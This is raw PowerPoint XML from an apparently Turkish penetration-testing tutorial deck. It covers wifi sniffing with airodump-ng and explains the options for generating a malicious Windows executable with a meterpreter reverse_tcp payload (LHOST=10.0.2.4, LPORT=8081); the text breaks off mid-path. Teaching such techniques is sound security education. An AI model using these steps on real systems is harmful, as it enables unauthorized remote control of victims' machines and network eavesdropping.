                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> Shell almamıza, zararlı yazılım oluşturmamıza yarar. Kısaca kullanımından bahsedecek olursak.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3929628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tablo içeren bir resim&#10;&#10;Açıklama otomatik olarak oluşturuldu">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4F9982E-02D8-0C83-95DE-60695EC883A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="188685" y="2914670"/>
            <a:ext cx="11553371" cy="3515475"/>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F49F7032-7F55-0FAB-6298-65C32C8258DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="304799" y="171450"/>
            <a:ext cx="11553371" cy="1774308"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Metin kutusu 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D14731A-7FBF-64FF-22DC-90414B6D5B13}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="638629" y="2060882"/>
            <a:ext cx="10174683" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Monitör moda aldığımız </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>wifi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> kartımızı şimdi dinleme işlemi yapacağız. Bu kısımda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>airodump-ng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> aracını kullanılır. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>«</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>airodump-ng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> wlan0mon» </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>parametresi ile dinleme başlatılır.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Dikdörtgen 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3541C9A-897F-307A-CC43-DBD5DAF851D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304799" y="5964865"/>
            <a:ext cx="9444413" cy="37213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33CEAA5E-BA47-B389-D8B2-C5A8A78B6F91}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8654902" y="3429000"/>
            <a:ext cx="712382" cy="419986"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:pr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3FE0CA3C-5E9B-91EA-04C9-F12A5A1AA74B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="188685" y="3429000"/>
            <a:ext cx="885203" cy="41998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Dikdörtgen 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65E35497-A366-90F0-E2C1-650B97AA0831}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5497033" y="3429000"/>
            <a:ext cx="598967" cy="41998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DC81C2E2-311F-B10B-92C2-B18F3E808458}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1073888" y="3377383"/>
            <a:ext cx="1116418" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>MAC Adresi</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Metin kutusu 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E66EE670-F683-51A1-04C8-89BAE4726028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5348177" y="3072809"/>
            <a:ext cx="978195" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Kanalı</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Metin kutusu 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB9A5B4C-018F-00FA-0FF6-5F1C53ECE3F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9484242" y="3429000"/>
            <a:ext cx="1733107" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Ağ Adı</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Dikdörtgen 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B91B7AF-828E-F678-79E9-DEB7B769894C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304799" y="4089233"/>
            <a:ext cx="11111346" cy="1875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967965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74464DEB-D066-66F4-B58C-4EF66D7573F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect t="2030" r="1" b="20158"/>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198159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AEA5577-6D95-30E0-5D7F-98560F8F616B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="575733"/>
            <a:ext cx="10220696" cy="6555641"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>-p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Oluşturduğumuz zararlı dosya açıldıktan sonra çalışmasını istediğimiz kod parçasını temsil eder..</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>f format</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> = Oluşturduğumuz zararlı dosyanın hangi formatta olmasını istiyorsak onu belirtiyoruz.(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>exe-dll-asp-vba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> vb.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>-a Architecture =</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> Oluşturduğumuz zararlı dosyanın hangi mimari üzerinde çalışacağını belirtiyoruz..(x32 –x64-x86-ARM)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>-o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>= Oluşturduğumuz zararlı dosyanın çıkarılacağı konumu belirtiyoruz.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>--platform </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1"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Oluşturduğumuz zararlı dosyanın hangi işletim sisteminde çalışmasını istiyorsak belirtmeliyiz.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>-LHOST = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Kendi IP’miz. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>–LPORT =</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> Dinlemek istediğimiz port numarası.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="tr-TR" sz="2000" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>-p  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>-p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="2000" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>LHOST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000"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sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> LHOST=10.0.2.4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>LPORT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000"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sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> LPORT=8081</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>-f  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>exe</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="2000" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>-a  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>x86</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>-o  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>/Desktop/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
